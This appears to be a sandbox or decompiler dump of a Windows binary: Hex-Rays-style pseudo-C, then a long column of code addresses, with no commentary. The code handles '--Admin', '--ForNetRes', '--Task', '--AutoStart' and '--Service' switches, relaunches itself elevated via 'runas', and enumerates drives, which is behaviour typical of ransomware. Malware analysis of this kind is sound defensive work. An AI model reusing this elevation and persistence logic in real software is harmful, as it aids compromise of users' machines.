                                                                                                    														if(_t697 != 0) {
                                                                                                    															do {
                                                                                                    																_t782 = E00412F40(E0041C430( &_v88));
                                                                                                    																_t1290 = _t1286 - 0x18;
                                                                                                    																E00412C40(_t1290, _t1212, _t782);
                                                                                                    																_t784 = E00412900( &_v8, 0);
                                                                                                    																_t400 = _t1212 + 0x880; // 0x880
                                                                                                    																E00413580(_t962, _t400, _t784);
                                                                                                    																E00413210( &_v12);
                                                                                                    																_t788 = E00413100( &_a96, _t1212,  &_a380);
                                                                                                    																_t789 = E00413100( &_v16, _t1212, L"%username%");
                                                                                                    																_t405 = _t1212 + 0x880; // 0x880
                                                                                                    																_t1239 = _t789;
                                                                                                    																_t790 = E00413660(_t405);
                                                                                                    																_t406 = _t1212 + 0x880; // 0x880
                                                                                                    																E0040F1F0(E004136A0(_t406, _t790 - 1), _t789, _t788);
                                                                                                    																_t1286 = _t1290 + 0x1c;
                                                                                                    																E00413210( &_v24);
                                                                                                    																E00413210( &_a84);
                                                                                                    																E0041C440( &_v108);
                                                                                                    																_t799 = E0041C450( &_v112, E0041C420( &_v96,  &_v104));
                                                                                                    																__eflags = _t799;
                                                                                                    															} while (_t799 != 0);
                                                                                                    														}
                                                                                                    														_t414 = _t1212 + 0x880; // 0x880
                                                                                                    														E004136C0(_t414,  &_a204);
                                                                                                    														E0040CA70(_t962,  &_v36, _t1212, _t1239);
                                                                                                    														_t416 = _t1212 + 0x850; // 0x850
                                                                                                    														E004130B0(_t1286 - 0x18, _t416);
                                                                                                    														E0040C740();
                                                                                                    														E004111C0(E0041C2F0(), L"I:\\5d2860c89d774.jpg");
                                                                                                    														E0041BA10(_a4);
                                                                                                    														_t707 = E0041BA80(_a4);
                                                                                                    														__eflags = _t707;
                                                                                                    														if(_t707 != 0) {
                                                                                                    															 *(_t1212 + 0x8c0) = 0;
                                                                                                    															 *_t1212 =  *0x51323c;
                                                                                                    															E00413560( &_v4);
                                                                                                    															E00410A50( &_v4);
                                                                                                    															E0041C140(E00413560( &_v32),  &_v4);
                                                                                                    															E00413600( &_v36);
                                                                                                    															E00413100( &_v36, _t1212, L"F:\\");
                                                                                                    															E00413580(_t962,  &_v12,  &_v40);
                                                                                                    															E00413210( &_v44);
                                                                                                    															E00413640( &_v16,  &_v100);
                                                                                                    															_t723 = E00413900( &_v108, E00413650( &_v20,  &_v48));
                                                                                                    															__eflags = _t723;
                                                                                                    															if(_t723 != 0) {
                                                                                                    																_t966 = _v48;
                                                                                                    																do {
                                                                                                    																	E0041C330(_t1212, _t1239, E0041F110( &_v84));
                                                                                                    																	E0041C240(_t1212, _t1239, E00419D10( &_a896));
                                                                                                    																	L214();
                                                                                                    																	_t770 = E0041C2F0();
                                                                                                    																	 *(_t1212 + 0x8c0) =  *(_t1212 + 0x8c0) + 1;
                                                                                                    																	_t1239 = _t770;
                                                                                                    																	E0041B8B0(_t966, _t1239, _t966);
                                                                                                    																	_t773 = E004134B0(E0041C470( &_v100));
                                                                                                    																	_t441 = _t1239 + 0x8a4; // 0x8a4
                                                                                                    																	E00413260(_t441, _t1212, _t773);
                                                                                                    																	 *((char*)(_t1239 + 0x8e0)) = 1;
                                                                                                    																	E0041FA10(E0041C3D0(), _t1239);
                                                                                                    																	E004138D0( &_v108);
                                                                                                    																	_t780 = E00413900( &_v112, E00413650( &_v24,  &_v52));
                                                                                                    																	__eflags = _t780;
                                                                                                    																} while (_t780 != 0);
                                                                                                    															}
                                                                                                    															 *0x529238 =  *0x51323c;
                                                                                                    															E0041FDC0(0x529238);
                                                                                                    															_t727 = GetMessageW( &_a272, 0, 0, 0);
                                                                                                    															__eflags = _t727;
                                                                                                    															if(_t727 != 0) {
                                                                                                    																do {
                                                                                                    																	TranslateMessage( &_a276);
                                                                                                    																	DispatchMessageW( &_a276);
                                                                                                    																	_t765 = GetMessageW( &_a276, 0, 0, 0);
                                                                                                    																	__eflags = _t765;
                                                                                                    																} while (_t765 != 0);
                                                                                                    															}
                                                                                                    															_t728 =  *0x513250;
                                                                                                    															__eflags = _t728;
                                                                                                    															if(_t728 != 0) {
                                                                                                    																PostThreadMessageW(_t728, 0x12, 0, 0);
                                                                                                    																do {
                                                                                                    																	_t754 = PeekMessageW( &_a104, 0, 0, 0, 1);
                                                                                                    																	__eflags = _t754;
                                                                                                    																	if(_t754 != 0) {
                                                                                                    																		do {
                                                                                                    																			DispatchMessageW( &_a104);
                                                                                                    																			_t759 = PeekMessageW( &_a104, 0, 0, 0, 1);
                                                                                                    																			__eflags = _t759;
                                                                                                    																		} while (_t759 != 0);
                                                                                                    																	}
                                                                                                    																	_t755 = WaitForSingleObject( *0x513240, 0xa);
                                                                                                    																	__eflags = _t755 - 0x102;
                                                                                                    																} while (_t755 == 0x102);
                                                                                                    															}
                                                                                                    															_t729 =  *0x51324c;
                                                                                                    															__eflags = _t729;
                                                                                                    															if(_t729 != 0) {
                                                                                                    																PostThreadMessageW(_t729, 0x12, 0, 0);
                                                                                                    																do {
                                                                                                    																	_t746 = PeekMessageW( &_a104, 0, 0, 0, 1);
                                                                                                    																	__eflags = _t746;
                                                                                                    																	if(_t746 != 0) {
                                                                                                    																		do {
                                                                                                    																			DispatchMessageW( &_a104);
                                                                                                    																			_t751 = PeekMessageW( &_a104, 0, 0, 0, 1);
                                                                                                    																			__eflags = _t751;
                                                                                                    																		} while (_t751 != 0);
                                                                                                    																	}
                                                                                                    																	_t747 = WaitForSingleObject( *0x513248, 0xa);
                                                                                                    																	__eflags = _t747 - 0x102;
                                                                                                    																} while (_t747 == 0x102);
                                                                                                    															}
                                                                                                    															__eflags =  *0x513234;
                                                                                                    															_t730 =  *0x513230;
                                                                                                    															if( *0x513234 == 0) {
                                                                                                    																_t730 =  *0x513238;
                                                                                                    															}
                                                                                                    															__eflags = _t730;
                                                                                                    															if(_t730 != 0) {
                                                                                                    																CloseHandle(_t730);
                                                                                                    															}
                                                                                                    															_t1242 = _a284;
                                                                                                    															E00413600( &_v4);
                                                                                                    														} else {
                                                                                                    															_t1242 = 0;
                                                                                                    														}
                                                                                                    														E004139D0( &_v76);
                                                                                                    														E00412D50( &_a304);
                                                                                                    														E00412D50( &_a228);
                                                                                                    														E00412D50( &_a156);
                                                                                                    														E00412D50( &_a180);
                                                                                                    													} else {
                                                                                                    														_t1242 = 0;
                                                                                                    													}
                                                                                                    													E00412D50( &_a252);
                                                                                                    												} else {
                                                                                                    													_t868 = GetVersion();
                                                                                                    													__eflags = _t868 - 5;
                                                                                                    													if(_t868 <= 5) {
                                                                                                    														goto L60;
                                                                                                    													} else {
                                                                                                    														lstrcpyW( &_a968, L"--Admin");
                                                                                                    														lstrcatW( &_a968, L" IsNotAutoStart");
                                                                                                    														lstrcatW( &_a968, L" IsNotTask");
                                                                                                    														E0042B420( &_a400, 0, 0x38);
                                                                                                    														_a396.cbSize = 0x3c;
                                                                                                    														_a412 =  &_a3248;
                                                                                                    														_t1268 = _t1268 + 0xc;
                                                                                                    														_a400 = 0;
                                                                                                    														_a416 =  &_a968;
                                                                                                    														_t879 = _t1230 + 0x10;
                                                                                                    														__eflags =  *((intOrPtr*)(_t879 + 0x14)) - 8;
                                                                                                    														if( *((intOrPtr*)(_t879 + 0x14)) >= 8) {
                                                                                                    															_t879 =  *_t879;
                                                                                                    														}
                                                                                                    														_a420 = _t879;
                                                                                                    														_a424 = 5;
                                                                                                    														_a408 = L"runas";
                                                                                                    														_t881 = ShellExecuteExW( &_a396); // executed
                                                                                                    														__eflags = _t881;
                                                                                                    														if(_t881 == 0) {
                                                                                                    															L61:
                                                                                                    															_t581 = _a16;
                                                                                                    															goto L62;
                                                                                                    														} else {
                                                                                                    															_t1242 = 0;
                                                                                                    														}
                                                                                                    													}
                                                                                                    												}
                                                                                                    											}
                                                                                                    										}
                                                                                                    									}
                                                                                                    									E00413210( &_a204);
                                                                                                    									E00413210( &_a132);
                                                                                                    									E00412D50( &_a56);
                                                                                                    									E00413B10( &_a44);
                                                                                                    									return _t1242;
                                                                                                    								} else {
                                                                                                    									__eflags = 0;
                                                                                                    									E00413B10( &_a116);
                                                                                                    									return 0;
                                                                                                    								}
                                                                                                    							} else {
                                                                                                    								_t1145 = _a28;
                                                                                                    								_v12 = _t1145 + 0x14;
                                                                                                    								_t968 = _t1145 + 0xc;
                                                                                                    								_a24 = _t1145 + 0x10;
                                                                                                    								while(1) {
                                                                                                    									_t895 = E00420235(_t968, _t1201, _t1230,  *((intOrPtr*)(_t1145 + _t1201 * 4)), L"--Admin");
                                                                                                    									_t1264 = _t1264 + 8;
                                                                                                    									__eflags = _t895;
                                                                                                    									_t896 = _a28;
                                                                                                    									if(_t895 != 0) {
                                                                                                    										goto L17;
                                                                                                    									}
                                                                                                    									__eflags = lstrcmpW(L"IsAutoStart",  *(_t896 + 4 + _t1201 * 4));
                                                                                                    									_t1154 =  ==  ? 1 : _a20 & 0x000000ff;
                                                                                                    									_a20 =  ==  ? 1 : _a20 & 0x000000ff;
                                                                                                    									__eflags = lstrcmpW(L"IsTask",  *_t968);
                                                                                                    									_t1157 =  ==  ? 1 : _a32 & 0x000000ff;
                                                                                                    									 *0x513235 = 1;
                                                                                                    									_t1201 = _t1201 + 2;
                                                                                                    									_a24 =  &(_a24[2]);
                                                                                                    									_t968 =  &(_t968[2]);
                                                                                                    									_a32 =  ==  ? 1 : _a32 & 0x000000ff;
                                                                                                    									_t923 =  &(_v12[2]);
                                                                                                    									L25:
                                                                                                    									_a24 =  &(_a24[1]);
                                                                                                    									_t1201 = _t1201 + 1;
                                                                                                    									_t968 =  &(_t968[1]);
                                                                                                    									_v12 =  &(_t923[1]);
                                                                                                    									__eflags = _t1201 - _a36;
                                                                                                    									if(_t1201 < _a36) {
                                                                                                    										_t1145 = _a28;
                                                                                                    										continue;
                                                                                                    									} else {
                                                                                                    										goto L26;
                                                                                                    									}
                                                                                                    									goto L235;
                                                                                                    									L17:
                                                                                                    									_t897 = E00420235(_t968, _t1201, _t1230,  *((intOrPtr*)(_t896 + _t1201 * 4)), L"--ForNetRes");
                                                                                                    									_t1264 = _t1264 + 8;
                                                                                                    									__eflags = _t897;
                                                                                                    									_t898 = _a28;
                                                                                                    									if(_t897 != 0) {
                                                                                                    										_t899 = E00420235(_t968, _t1201, _t1230,  *((intOrPtr*)(_t898 + _t1201 * 4)), L"--Task");
                                                                                                    										_t1264 = _t1264 + 8;
                                                                                                    										__eflags = _t899;
                                                                                                    										if(_t899 != 0) {
                                                                                                    											_t901 = E00420235(_t968, _t1201, _t1230,  *((intOrPtr*)(_a28 + _t1201 * 4)), L"--AutoStart");
                                                                                                    											_t1264 = _t1264 + 8;
                                                                                                    											__eflags = _t901;
                                                                                                    											if(_t901 != 0) {
                                                                                                    												_t903 = E00420235(_t968, _t1201, _t1230,  *((intOrPtr*)(_a28 + _t1201 * 4)), L"--Service");
                                                                                                    												_t1264 = _t1264 + 8;
                                                                                                    												__eflags = _t903;
                                                                                                    												if(_t903 == 0) {
                                                                                                    													_t969 = _a28;
                                                                                                    													_t1248 = E00423C92( *((intOrPtr*)(_t969 + 4 + _t1201 * 4)));
                                                                                                    													_a40 = _t1248;
                                                                                                    													lstrcpyW(0x51a7c0,  *(_t969 + 8 + _t1201 * 4));
                                                                                                    													lstrcpyW(0x521cf0,  *(_t969 + 0xc + _t1201 * 4));
                                                                                                    													while(1) {
                                                                                                    														_t1220 = OpenProcess(0x100000, 0, _t1248);
                                                                                                    														__eflags = _t1220;
                                                                                                    														if(_t1220 == 0) {
                                                                                                    															break;
                                                                                                    														}
                                                                                                    														_t916 = WaitForSingleObject(_t1220, 0x1f4);
                                                                                                    														_t917 = CloseHandle(_t1220);
                                                                                                    														_t916 - 0x102 = _t917 & 0xffffff00 | _t916 == 0x00000102;
                                                                                                    														if((_t917 & 0xffffff00 | _t916 == 0x00000102) == 0) {
                                                                                                    															break;
                                                                                                    														} else {
                                                                                                    															_t919 = E00411AB0();
                                                                                                    															__eflags = _t919;
                                                                                                    															if(_t919 != 0) {
                                                                                                    																GlobalFree(_t969);
                                                                                                    																__eflags = 0;
                                                                                                    																E00413B10( &_a116);
                                                                                                    																return 0;
                                                                                                    															} else {
                                                                                                    																Sleep(1);
                                                                                                    																_t1248 = _a40;
                                                                                                    																continue;
                                                                                                    															}
                                                                                                    														}
                                                                                                    														goto L235;
                                                                                                    													}
                                                                                                    													E00411CD0(_t969, 0, 0);
                                                                                                    													 *0x529224 = 0;
                                                                                                    													_t1249 = GetCurrentProcess();
                                                                                                    													_a40 = 0;
                                                                                                    													GetExitCodeProcess(_t1249,  &_a40);
                                                                                                    													TerminateProcess(_t1249, _a40);
                                                                                                    													CloseHandle(_t1249);
                                                                                                    													__eflags = 0;
                                                                                                    													E00413B10( &_a116);
                                                                                                    													return 0; // executed
                                                                                                    												} else {
                                                                                                    													goto L24;
                                                                                                    												}
                                                                                                    											} else {
                                                                                                    												_a20 = 1;
                                                                                                    												goto L24;
                                                                                                    											}
                                                                                                    										} else {
                                                                                                    											_a32 = 1;
                                                                                                    											L24:
                                                                                                    											_t923 = _v12;
                                                                                                    											goto L25;
                                                                                                    										}
                                                                                                    									} else {
                                                                                                    										 *0x513234 = 1;
                                                                                                    										lstrcpyW(0x51a7c0,  *(_t898 + 4 + _t1201 * 4));
                                                                                                    										lstrcpyW(0x521cf0,  *_t968);
                                                                                                    										__eflags = lstrcmpW(L"IsAutoStart",  *_a24);
                                                                                                    										_t1149 =  ==  ? 1 : _a20 & 0x000000ff;
                                                                                                    										_a20 =  ==  ? 1 : _a20 & 0x000000ff;
                                                                                                    										__eflags = lstrcmpW(L"IsTask",  *_v12);
                                                                                                    										_t1151 =  ==  ? 1 : _a32 & 0x000000ff;
                                                                                                    										_a24 =  &(_a24[4]);
                                                                                                    										_t1201 = _t1201 + 4;
                                                                                                    										_t968 =  &(_t968[4]);
                                                                                                    										_a32 =  ==  ? 1 : _a32 & 0x000000ff;
                                                                                                    										_t923 =  &(_v12[4]);
                                                                                                    										goto L25;
                                                                                                    									}
                                                                                                    									goto L235;
                                                                                                    								}
                                                                                                    							}
                                                                                                    						}
                                                                                                    					}
                                                                                                    				} else {
                                                                                                    					E004124E0();
                                                                                                    					return 0;
                                                                                                    				}
                                                                                                    				L235:
                                                                                                    			}






















































































































































































































                                                                                                    0x00419f93
                                                                                                    0x00419f9b
                                                                                                    0x00419fa3
                                                                                                    0x00419fa5
                                                                                                    0x00419fa6
                                                                                                    0x00419fab
                                                                                                    0x00419fb2
                                                                                                    0x00419fc4
                                                                                                    0x00419fd2
                                                                                                    0x00419fda
                                                                                                    0x00419fe0
                                                                                                    0x00419fe2
                                                                                                    0x00419fe4
                                                                                                    0x00419fe4
                                                                                                    0x00419fe6
                                                                                                    0x00419ff1
                                                                                                    0x00419ff9
                                                                                                    0x0041a005
                                                                                                    0x0041a00a
                                                                                                    0x0041a015
                                                                                                    0x0041a017
                                                                                                    0x0041a019
                                                                                                    0x0041a01c
                                                                                                    0x0041b669
                                                                                                    0x0041b66e
                                                                                                    0x00000000
                                                                                                    0x0041a022
                                                                                                    0x0041a02a
                                                                                                    0x0041a030
                                                                                                    0x0041a036
                                                                                                    0x0041a038
                                                                                                    0x0041a03d
                                                                                                    0x0041a048
                                                                                                    0x0041a04d
                                                                                                    0x0041a058
                                                                                                    0x0041a05a
                                                                                                    0x0041a05c
                                                                                                    0x0041a05f
                                                                                                    0x0041b673
                                                                                                    0x0041b673
                                                                                                    0x0041b678
                                                                                                    0x0041b67d
                                                                                                    0x0041b67e
                                                                                                    0x0041b67f
                                                                                                    0x0041b680
                                                                                                    0x0041b681
                                                                                                    0x0041b683
                                                                                                    0x0041b68a
                                                                                                    0x0041b692
                                                                                                    0x0041b697
                                                                                                    0x0041b697
                                                                                                    0x0041b69a
                                                                                                    0x0041b6a4
                                                                                                    0x0041b6ae
                                                                                                    0x0041b6b5
                                                                                                    0x0041b6bc
                                                                                                    0x0041b6c4
                                                                                                    0x0041b6c9
                                                                                                    0x0041b6c9
                                                                                                    0x0041b6ce
                                                                                                    0x0041b6d8
                                                                                                    0x0041b6e2
                                                                                                    0x0041b6e9
                                                                                                    0x0041b6ef
                                                                                                    0x0041b6f1
                                                                                                    0x0041b6fa
                                                                                                    0x0041b705
                                                                                                    0x0041b70a
                                                                                                    0x0041b70d
                                                                                                    0x0041b717
                                                                                                    0x0041b721
                                                                                                    0x0041b721
                                                                                                    0x0041b72b
                                                                                                    0x0041b731
                                                                                                    0x0041b733
                                                                                                    0x0041b73c
                                                                                                    0x0041b747
                                                                                                    0x0041b74c
                                                                                                    0x0041b74f
                                                                                                    0x0041b759
                                                                                                    0x0041b763
                                                                                                    0x0041b763
                                                                                                    0x0041b76d
                                                                                                    0x0041b773
                                                                                                    0x0041b775
                                                                                                    0x0041b77e
                                                                                                    0x0041b789
                                                                                                    0x0041b78e
                                                                                                    0x0041b791
                                                                                                    0x0041b79b
                                                                                                    0x0041b7a5
                                                                                                    0x0041b7a5
                                                                                                    0x0041b7af
                                                                                                    0x0041b7b6
                                                                                                    0x0041b7be
                                                                                                    0x0041b7c3
                                                                                                    0x0041b7c3
                                                                                                    0x0041b7c8
                                                                                                    0x0041b7d2
                                                                                                    0x0041b7dc
                                                                                                    0x0041b7e3
                                                                                                    0x0041b7ea
                                                                                                    0x0041b7f2
                                                                                                    0x0041b7f7
                                                                                                    0x0041b7f7
                                                                                                    0x0041b7fc
                                                                                                    0x0041b806
                                                                                                    0x0041b810
                                                                                                    0x0041b817
                                                                                                    0x0041b81e
                                                                                                    0x0041b826
                                                                                                    0x0041b82b
                                                                                                    0x0041b82b
                                                                                                    0x0041b830
                                                                                                    0x0041b83a
                                                                                                    0x0041b844
                                                                                                    0x0041b84b
                                                                                                    0x0041b852
                                                                                                    0x0041b85a
                                                                                                    0x0041b85f
                                                                                                    0x0041b85f
                                                                                                    0x0041b864
                                                                                                    0x0041b86e
                                                                                                    0x0041b878
                                                                                                    0x0041b87f
                                                                                                    0x0041b883
                                                                                                    0x0041b888
                                                                                                    0x0041b88d
                                                                                                    0x0041b890
                                                                                                    0x0041b897
                                                                                                    0x0041b899
                                                                                                    0x0041b8a0
                                                                                                    0x0041b8a5
                                                                                                    0x0041a065
                                                                                                    0x0041a06d
                                                                                                    0x0041a073
                                                                                                    0x0041a079
                                                                                                    0x0041a07b
                                                                                                    0x0041a08f
                                                                                                    0x0041a099
                                                                                                    0x0041a09d
                                                                                                    0x0041a09f
                                                                                                    0x0041a0a3
                                                                                                    0x0041a0a7
                                                                                                    0x0041a0ac
                                                                                                    0x0041a0bb
                                                                                                    0x0041a0c2
                                                                                                    0x0041a0c8
                                                                                                    0x0041a0ce
                                                                                                    0x0041a0e7
                                                                                                    0x0041a0f3
                                                                                                    0x0041a0fb
                                                                                                    0x0041a100
                                                                                                    0x0041a10a
                                                                                                    0x0041a10c
                                                                                                    0x0041a10e
                                                                                                    0x0041a112
                                                                                                    0x0041a116
                                                                                                    0x0041a11b
                                                                                                    0x0041a11b
                                                                                                    0x0041a11e
                                                                                                    0x0041a120
                                                                                                    0x0041a127
                                                                                                    0x0041a130
                                                                                                    0x0041a13b
                                                                                                    0x0041a13b
                                                                                                    0x0041a140
                                                                                                    0x0041a148
                                                                                                    0x0041a151
                                                                                                    0x0041a156
                                                                                                    0x0041a156
                                                                                                    0x0041a159
                                                                                                    0x0041a16d
                                                                                                    0x0041a173
                                                                                                    0x0041a181
                                                                                                    0x0041a187
                                                                                                    0x0041a18c
                                                                                                    0x0041a190
                                                                                                    0x0041a33d
                                                                                                    0x0041a341
                                                                                                    0x0041a347
                                                                                                    0x0041a34e
                                                                                                    0x0041a45c
                                                                                                    0x0041a461
                                                                                                    0x0041a354
                                                                                                    0x0041a359
                                                                                                    0x0041a359
                                                                                                    0x0041a464
                                                                                                    0x0041a48a
                                                                                                    0x0041a48f
                                                                                                    0x0041a493
                                                                                                    0x0041a496
                                                                                                    0x0041a4a1
                                                                                                    0x0041a4a1
                                                                                                    0x0041a4a3
                                                                                                    0x0041a4ae
                                                                                                    0x0041a4b6
                                                                                                    0x0041a4b6
                                                                                                    0x0041a4b9
                                                                                                    0x0041a4bc
                                                                                                    0x0041a4c2
                                                                                                    0x0041a4c7
                                                                                                    0x0041a4d0
                                                                                                    0x0041a4d0
                                                                                                    0x0041a4d2
                                                                                                    0x0041a4d3
                                                                                                    0x0041a4d3
                                                                                                    0x0041a4d7
                                                                                                    0x0041a4d7
                                                                                                    0x0041a4be
                                                                                                    0x0041a4be
                                                                                                    0x0041a4be
                                                                                                    0x0041a4db
                                                                                                    0x0041a4e4
                                                                                                    0x0041a4e9
                                                                                                    0x0041a4ea
                                                                                                    0x0041a4ea
                                                                                                    0x0041a4ef
                                                                                                    0x0041a4fe
                                                                                                    0x0041a506
                                                                                                    0x0041a50c
                                                                                                    0x0041a51b
                                                                                                    0x0041a529
                                                                                                    0x0041a531
                                                                                                    0x0041a538
                                                                                                    0x0041a547
                                                                                                    0x0041a553
                                                                                                    0x0041a55e
                                                                                                    0x0041a563
                                                                                                    0x0041a567
                                                                                                    0x0041a56a
                                                                                                    0x0041a56e
                                                                                                    0x0041a570
                                                                                                    0x0041a6ea
                                                                                                    0x0041a6ea
                                                                                                    0x0041a576
                                                                                                    0x0041a576
                                                                                                    0x0041a578
                                                                                                    0x00000000
                                                                                                    0x0041a57e
                                                                                                    0x0041a580
                                                                                                    0x0041a588
                                                                                                    0x0041a58b
                                                                                                    0x0041a59b
                                                                                                    0x0041a5a4
                                                                                                    0x0041a5af
                                                                                                    0x0041a5b2
                                                                                                    0x0041a5b6
                                                                                                    0x0041a5b8
                                                                                                    0x0041a5bf
                                                                                                    0x0041a5c7
                                                                                                    0x0041a5cf
                                                                                                    0x0041a5d6
                                                                                                    0x0041a5db
                                                                                                    0x0041a5de
                                                                                                    0x0041a5e3
                                                                                                    0x0041a5e9
                                                                                                    0x0041a5ee
                                                                                                    0x0041a5ee
                                                                                                    0x0041a5f1
                                                                                                    0x0041a5f1
                                                                                                    0x0041a578
                                                                                                    0x0041a5f5
                                                                                                    0x0041a602
                                                                                                    0x0041a6f9
                                                                                                    0x0041a6f9
                                                                                                    0x00000000
                                                                                                    0x0041a608
                                                                                                    0x0041a608
                                                                                                    0x0041a60a
                                                                                                    0x0041a702
                                                                                                    0x0041a702
                                                                                                    0x0041a709
                                                                                                    0x00000000
                                                                                                    0x0041a70f
                                                                                                    0x0041a70f
                                                                                                    0x0041a711
                                                                                                    0x0041a717
                                                                                                    0x0041a719
                                                                                                    0x0041a72a
                                                                                                    0x0041a72f
                                                                                                    0x0041a733
                                                                                                    0x0041a736
                                                                                                    0x0041a741
                                                                                                    0x0041a741
                                                                                                    0x0041a743
                                                                                                    0x0041a74e
                                                                                                    0x0041a752
                                                                                                    0x0041a752
                                                                                                    0x0041a755
                                                                                                    0x0041a758
                                                                                                    0x0041a75e
                                                                                                    0x0041a760
                                                                                                    0x0041a763
                                                                                                    0x0041a763
                                                                                                    0x0041a765
                                                                                                    0x0041a766
                                                                                                    0x0041a766
                                                                                                    0x0041a76a
                                                                                                    0x0041a76a
                                                                                                    0x0041a75a
                                                                                                    0x0041a75a
                                                                                                    0x0041a75a
                                                                                                    0x0041a76c
                                                                                                    0x0041a775
                                                                                                    0x0041a77a
                                                                                                    0x0041a77b
                                                                                                    0x0041a77b
                                                                                                    0x0041a784
                                                                                                    0x0041a788
                                                                                                    0x0041a78e
                                                                                                    0x0041a790
                                                                                                    0x0041a792
                                                                                                    0x0041a797
                                                                                                    0x0041a797
                                                                                                    0x0041a7bb
                                                                                                    0x0041a7c1
                                                                                                    0x0041a7c9
                                                                                                    0x0041a7ce
                                                                                                    0x0041a7d4
                                                                                                    0x0041a7d9
                                                                                                    0x0041a7d9
                                                                                                    0x0041a7ce
                                                                                                    0x0041a719
                                                                                                    0x0041a7e7
                                                                                                    0x0041a7ec
                                                                                                    0x0041a7ef
                                                                                                    0x0041a7ef
                                                                                                    0x0041a7f1
                                                                                                    0x0041a7f1
                                                                                                    0x0041a7f9
                                                                                                    0x0041a803
                                                                                                    0x0041a813
                                                                                                    0x0041a819
                                                                                                    0x0041a81e
                                                                                                    0x0041a82f
                                                                                                    0x0041a83b
                                                                                                    0x0041a841
                                                                                                    0x0041a842
                                                                                                    0x0041a842
                                                                                                    0x0041a852
                                                                                                    0x0041a854
                                                                                                    0x0041a85b
                                                                                                    0x0041a87a
                                                                                                    0x0041a886
                                                                                                    0x0041a88c
                                                                                                    0x0041a895
                                                                                                    0x0041a89a
                                                                                                    0x0041a89a
                                                                                                    0x0041a8af
                                                                                                    0x0041a8af
                                                                                                    0x00000000
                                                                                                    0x0041a610
                                                                                                    0x0041a610
                                                                                                    0x0041a612
                                                                                                    0x00000000
                                                                                                    0x0041a618
                                                                                                    0x0041a618
                                                                                                    0x0041a61e
                                                                                                    0x0041a8b6
                                                                                                    0x0041a8c5
                                                                                                    0x0041a8ca
                                                                                                    0x0041a8d5
                                                                                                    0x0041a8da
                                                                                                    0x0041a8de
                                                                                                    0x0041a8e1
                                                                                                    0x0041a8ec
                                                                                                    0x0041a8ec
                                                                                                    0x0041a8ee
                                                                                                    0x0041a8f9
                                                                                                    0x0041a901
                                                                                                    0x0041a901
                                                                                                    0x0041a904
                                                                                                    0x0041a907
                                                                                                    0x0041a90d
                                                                                                    0x0041a90f
                                                                                                    0x0041a912
                                                                                                    0x0041a912
                                                                                                    0x0041a914
                                                                                                    0x0041a915
                                                                                                    0x0041a915
                                                                                                    0x0041a919
                                                                                                    0x0041a919
                                                                                                    0x0041a909
                                                                                                    0x0041a909
                                                                                                    0x0041a909
                                                                                                    0x0041a91b
                                                                                                    0x0041a924
                                                                                                    0x0041a929
                                                                                                    0x0041a92a
                                                                                                    0x0041a92a
                                                                                                    0x0041a92f
                                                                                                    0x0041a932
                                                                                                    0x0041a93a
                                                                                                    0x0041a93c
                                                                                                    0x0041a944
                                                                                                    0x0041a94b
                                                                                                    0x0041a952
                                                                                                    0x0041a955
                                                                                                    0x0041a95c
                                                                                                    0x0041a962
                                                                                                    0x0041a967
                                                                                                    0x0041a967
                                                                                                    0x0041a970
                                                                                                    0x0041a970
                                                                                                    0x0041a973
                                                                                                    0x0041a976
                                                                                                    0x0041a976
                                                                                                    0x0041a97b
                                                                                                    0x0041a97b
                                                                                                    0x0041a97d
                                                                                                    0x0041a95e
                                                                                                    0x0041a95e
                                                                                                    0x0041a95e
                                                                                                    0x0041a97f
                                                                                                    0x0041a987
                                                                                                    0x0041a992
                                                                                                    0x0041a997
                                                                                                    0x0041a99a
                                                                                                    0x0041a99e
                                                                                                    0x0041a9a0
                                                                                                    0x0041a9a0
                                                                                                    0x0041a9a6
                                                                                                    0x0041a9ab
                                                                                                    0x0041a9b0
                                                                                                    0x0041a9b4
                                                                                                    0x0041a9ba
                                                                                                    0x0041a9bf
                                                                                                    0x0041a9bf
                                                                                                    0x0041a9c6
                                                                                                    0x0041a9cc
                                                                                                    0x0041a9cf
                                                                                                    0x0041a9d8
                                                                                                    0x0041a9dd
                                                                                                    0x0041a9df
                                                                                                    0x0041a9e1
                                                                                                    0x0041a9e8
                                                                                                    0x0041a9ef
                                                                                                    0x0041a9f2
                                                                                                    0x0041a9f9
                                                                                                    0x0041a9ff
                                                                                                    0x0041aa04
                                                                                                    0x0041aa04
                                                                                                    0x0041aa07
                                                                                                    0x0041aa07
                                                                                                    0x0041aa0a
                                                                                                    0x0041aa0d
                                                                                                    0x0041aa0d
                                                                                                    0x0041aa12
                                                                                                    0x0041aa12
                                                                                                    0x0041aa14
                                                                                                    0x0041a9fb
                                                                                                    0x0041a9fb
                                                                                                    0x0041a9fb
                                                                                                    0x0041aa16
                                                                                                    0x0041aa1e
                                                                                                    0x0041aa29
                                                                                                    0x0041aa2e
                                                                                                    0x0041aa31
                                                                                                    0x0041aa35
                                                                                                    0x0041aa37
                                                                                                    0x0041aa37
                                                                                                    0x0041aa3e
                                                                                                    0x0041aa44
                                                                                                    0x0041aa49
                                                                                                    0x0041aa4f
                                                                                                    0x0041aa54
                                                                                                    0x0041aa54
                                                                                                    0x0041aa57
                                                                                                    0x0041aa5f
                                                                                                    0x0041aa65
                                                                                                    0x0041aa6a
                                                                                                    0x0041aa6a
                                                                                                    0x0041aa70
                                                                                                    0x0041aa70
                                                                                                    0x0041aa73
                                                                                                    0x0041aa76
                                                                                                    0x0041aa76
                                                                                                    0x0041aa7b
                                                                                                    0x0041aa7b
                                                                                                    0x0041aa7d
                                                                                                    0x0041aa61
                                                                                                    0x0041aa61
                                                                                                    0x0041aa61
                                                                                                    0x0041aa7f
                                                                                                    0x0041aa8b
                                                                                                    0x0041aa9b
                                                                                                    0x0041aaa0
                                                                                                    0x0041aaa4
                                                                                                    0x0041aaa7
                                                                                                    0x0041aab2
                                                                                                    0x0041aab2
                                                                                                    0x0041aab4
                                                                                                    0x0041aabf
                                                                                                    0x0041aac7
                                                                                                    0x0041aac7
                                                                                                    0x0041aaca
                                                                                                    0x0041aacd
                                                                                                    0x0041aad3
                                                                                                    0x0041aad5
                                                                                                    0x0041aad8
                                                                                                    0x0041aad8
                                                                                                    0x0041aada
                                                                                                    0x0041aadb
                                                                                                    0x0041aadb
                                                                                                    0x0041aadf
                                                                                                    0x0041aadf
                                                                                                    0x0041aacf
                                                                                                    0x0041aacf
                                                                                                    0x0041aacf
                                                                                                    0x0041aae1
                                                                                                    0x0041aaea
                                                                                                    0x0041aaef
                                                                                                    0x0041aaf0
                                                                                                    0x0041aaf0
                                                                                                    0x0041aaf5
                                                                                                    0x0041aaff
                                                                                                    0x0041ab03
                                                                                                    0x0041ab07
                                                                                                    0x0041ab0e
                                                                                                    0x0041ab16
                                                                                                    0x0041ab18
